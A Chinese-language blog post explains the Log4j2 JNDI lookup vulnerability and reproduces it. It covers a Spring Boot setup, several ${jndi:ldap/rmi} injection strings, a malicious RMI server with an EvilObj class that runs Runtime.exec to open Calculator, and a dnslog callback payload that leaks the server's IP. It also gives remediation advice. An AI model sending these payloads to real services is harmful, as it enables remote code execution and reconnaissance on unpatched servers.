Log4j2最近被爆出巨大漏洞

一、背景

近日，知名sl4j日志规范的实现框架log4j2被爆出巨大漏洞，可被黑客利用JNDI机制来执行非法命令、拉取远程代码执行，获取非法服务器权限等，不幸的是很多知名框架也用了log4j2，我们熟知的就有Apache Struts2、Apache Solr、Apache Druid、Apache Flink…

相信很多互联网厂此刻正瑟瑟发抖，紧急修复。

国家网络应急中心也紧急发布了处理意见：关于Apache Log4j2存在远程代码执行漏洞的安全公告

罪魁祸首是Apache Log4j2、2.0 - 2.15.0-rc1这个两个版本，比如你的项目中有org.apache.logging.log4j:log4j-core:jar:2.14.1，那就赶紧去修复吧。

导致该问题的原因是log4j2支持jndi的lookup

很多服务使用了log4j2框架，并且打了API入参日志、三方交互日志等，正在被黑客与攻击者拿去搞事情，目前很多安全厂商都给出了替换版本、修改JVM启动参数、日志格式配置文件等的低成本解决办法，不过这里我还是觉得全面移除掉log4j2（可换成logback）比较保险，并且只要是基于sl4j规范来开发的，替换成本也是相当的低！

二、复现方法

下面以springboot服务为例：

log4j2框架maven依赖：

   <dependencies><dependency><groupId>org.springframework.boot</groupId><artifactId>spring-boot-starter-web</artifactId><exclusions><!-- 去掉springboot默认配置 --><exclusion><groupId>org.springframework.boot</groupId><artifactId>spring-boot-starter-logging</artifactId></exclusion></exclusions></dependency><dependency> <!-- 引入log4j2依赖 --><groupId>org.springframework.boot</groupId><artifactId>spring-boot-starter-log4j2</artifactId></dependency></dependencies>

log4j2.xml配置：

<?xml version="1.0" encoding="UTF-8"?>
<Configuration status="WARN"><Appenders><!--控制台日志--><Console name="stdout" target="SYSTEM_OUT"><PatternLayout pattern="%date{HH:mm:ss.SSS} [%thread] %-5level %logger{36} - %msg%n"/></Console><!--文件日志--><File name="file" fileName="logs/test.log" append="false"><PatternLayout pattern="%date{HH:mm:ss.SSS} [%thread] %-5level %logger{36} - %msg%n"/></File></Appenders><Loggers><Root level="info"><AppenderRef ref="file"/><AppenderRef ref="stdout"/></Root></Loggers></Configuration>

application.yml配置：


logging:config: classpath:log4j2.xml

测试方法：

public class Main {private static final Logger logger = LoggerFactory.getLogger(Main.class);public static void main(String[] args) {logger.info("username is:{}", "${java:os}");logger.info("${jndi:ldap://127.0.0.1:1389/#Exploit}");logger.error("${}", "jndi:ldap://127.0.0.1:1389/#Exploit");logger.error("{}", "${jndi:ldap://127.0.0.1:1389/#Exploit}");}
}

这里如果是调用的：jndi:rmi://xxx，那么可以实现用户输入信息后，利用RMI远程调用来调用黑客远程的代码，到服务本机来执行（黑客可以再编写一个api回调信息、也可以执行一些Runtime命令），这就非常危险了。

之前是在log4j2的2.15.0以前的版本，都有该漏洞官方收到反馈后，紧急发布了： 2.15.0-rc1版本，后面此版本被黑客成功绕过，故官方又重新发布了2.15.0-rc2版本。

下面我们演示一下黑客利用RMI的操作：

1、首先编写远程类：

public class RmiServer {public static void main(String[] args) throws Exception {Registry registry = LocateRegistry.createRegistry(1111);Reference reference = new Reference("com.test.EvilObj", "com.test.EvilObj", null);ReferenceWrapper wrapper = new ReferenceWrapper(reference);registry.rebind("evil", wrapper);System.out.println("RMI服务已经启动....");}}

public class EvilObj {static {System.out.println("一段代码执行了...");}
}

2、通过log2j漏洞，远程调用（相当于被攻击服务拉取黑客代码到本地执行）

public class Main {private static final Logger logger = LoggerFactory.getLogger(Main.class);public static void main(String[] args) {String username = "${jndi:rmi://127.0.0.1:1111/evil}";logger.info("username is:{}", username);}
}

例如我们这里打开计算器：

public class EvilObj extends UnicastRef implements ObjectFactory {//    static {//
//    }public EvilObj() {System.out.println("构造方法被执行了");}@Overridepublic Object getObjectInstance(Object obj, Name name, Context nameCtx, Hashtable<?, ?> environment) throws Exception {openCalc();return new EvilObj();}private void openCalc() {try {System.out.println("工厂方法已经执行");Runtime.getRuntime().exec("open /Applications/Calculator.app");} catch (IOException e) {e.printStackTrace();}}
}

本质原因：javax.naming.spi.NamingManager类中getObjectFactoryFromReference方法中clas.newInstance()为罪魁祸首。

static ObjectFactory getObjectFactoryFromReference(Reference ref, String factoryName)throws IllegalAccessException,InstantiationException,MalformedURLException {Class<?> clas = null;// Try to use current class loadertry {clas = helper.loadClass(factoryName);} catch (ClassNotFoundException e) {// ignore and continue// e.printStackTrace();}// All other exceptions are passed up.// Not in class path; try to use codebaseString codebase;if (clas == null &&(codebase = ref.getFactoryClassLocation()) != null) {try {clas = helper.loadClass(factoryName, codebase);} catch (ClassNotFoundException e) {}}return (clas != null) ? (ObjectFactory) clas.newInstance() : null;}

利用dnslog，还可以获取IP

http://dnslog.cn/

例如：ibfx5p.dnslog.cn
1、黑客首先再dnslog获取一个临时地址

2、再注入：${jndi:ldap://ibfx5p.dnslog.cn}

题外话

新技术的固然有性能更好等特点，不过在使用的时候最好也还是等它稳定一段时间再用，springboot官方配置的实现框架是logback，目前还没有爆出什么大的漏洞。